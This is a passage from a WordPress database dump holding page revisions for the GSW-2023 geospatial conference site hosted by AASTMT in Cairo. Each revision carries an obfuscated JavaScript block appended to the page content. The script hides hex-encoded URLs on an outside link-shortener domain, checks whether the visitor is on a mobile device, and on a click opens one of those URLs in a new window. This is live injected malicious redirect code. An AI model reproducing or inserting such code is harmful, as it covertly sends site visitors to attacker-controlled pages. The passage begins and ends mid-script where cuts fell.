_0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 17:59:23','2022-11-09 17:59:23','',3066,'https://gsw2023.com/?p=3176',0,'revision','',0),
(3177,1,'2022-11-09 18:03:13','2022-11-09 18:03:13','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:03:13','2022-11-09 18:03:13','',3066,'https://gsw2023.com/?p=3177',0,'revision','',0),
(3178,1,'2022-11-09 18:04:50','2022-11-09 18:04:50','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3><strong> EGYPT GSW\'2023</strong></h3>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 